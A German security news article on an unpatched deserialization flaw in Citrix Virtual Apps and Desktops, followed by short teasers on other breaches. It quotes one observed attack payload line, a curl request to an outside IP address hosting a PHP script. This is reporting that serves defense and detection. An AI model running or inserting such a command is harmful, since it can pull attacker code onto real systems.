Exploit für unpatchte Citrix-Sicherheitslücke bekannt geworden

Anfang November 2024 hat Watchtowr Labs Details zu einer noch nicht gepatchten Sicherheitslücke in Citrix’ Remote-Zugriffs-Lösung veröffentlicht. Diese Schwachstelle betrifft speziell Citrix Virtual Apps and Desktops, eine Lösung, die häufig für sicheren Remote-Zugang zu Desktop-Anwendungen verwendet wird – etwa in Call-Center-Umgebungen.

Die Schwachstelle betrifft das Deserialisierungsproblem in einer .NET-Funktion, die für die Sitzungsaufzeichnung verwendet wird. Diese Verwundbarkeit ermöglicht es einem Angreifer, den Exploit ohne Authentifizierung auszulösen. Der Angriff könnte nicht nur auf den Desktop selbst abzielen, sondern aufgrund der Privilegieneskalation den gesamten Server und alle darauf laufenden Sitzungen kompromittieren.

Das Exploit wird über einen SOAP-POST-Request initiiert und enthält eine bösartige Payload, das eine curl-Anfrage zu einer entfernten URL absendet:

curl http://91.212.166.60/script_xen80-mix.php

Die angeforderte URL war momentan nicht zugänglich, was darauf hindeutet, dass der Angreifer möglicherweise IP-Adressen filtert oder für Follow-up-Angriffe speichert. Die Anfrage scheint aus einer IP-Adresse in Johannesburg, Südafrika zu stammen.

Der Exploit erfordert keine vorherige Authentifizierung, was ihn besonders gefährlich macht. Unternehmen sollten daher auch ihre Firewalls und Intrusion Detection Systeme auf verdächtige Anfragen überprüfen, die mit der beschriebenen SOAP-Post-Methode zusammenhängen.

Related Posts

Destatis Datenleck: Prorussische Hacker erbeuten Dokumente über deutsche Unternehmen

November 2024 – Ein schwerwiegendes Datenleck erschüttert die deutsche Statistikbehörde Destatis. Hacker, die offenbar prorussische Hintergründe haben, haben eine umfangreiche Datenbank des Statistischen Bundesamts gehackt und diese nun im Darknet zum Verkauf angeboten. In Folge dessen bieten Hacker in einem Darknet-Forum Unternehmensdaten für etwa 250 Dollar zum Kauf an, die ansonsten über Destatis bezogen werden könnten. Laut Berichten umfasst die gestohlene Datenmenge rund 3,8 GB, die vertrauliche Informationen über deutsche Unternehmen enthalten. Unter anderem sind dort Kontaktdaten, Adressen, Umsatzsteuernummern, Abteilungszugehörigkeiten und sogar Steuerdokumente aufgetaucht.

Read More

MoveIt-Hack: Amazon bestätigt Datendiebstahl von 2,8 Mio Zeilen

Amazon hat bestätigt, dass Mitarbeiterdaten nach einem Sicherheitsvorfall bei einem Drittanbieter gestohlen wurden. Betroffen sind ausschließlich arbeitsbezogene Informationen wie E-Mail-Adressen, Durchwahlnummern und Bürostandorte. Amazon versichert laut TechCrunch, dass weder AWS noch andere interne Systeme beeinträchtigt wurden und keine sensiblen Daten wie Sozialversicherungsnummern betroffen sind. Die Sicherheitslücke bei dem betroffenen Anbieter wurde inzwischen behoben.

Read More

Apache CloudStack LTS - Kritische Sicherheitslücke in KVM Templates

Am 11. November 2024 veröffentlichte Apache CloudStack Sicherheitsupdates für die LTS-Versionen 4.18.2.5 und 4.19.1.3. Diese beheben eine kritische Sicherheitslücke (CVE-2024-50386), die KVM-basierte Infrastrukturen gefährdet. Angreifer konnten über unsichere Templates auf den Primärspeicher zugreifen und bösartige Instanzen deployen, die die Host-Dateisysteme gefährden könnten.

Read More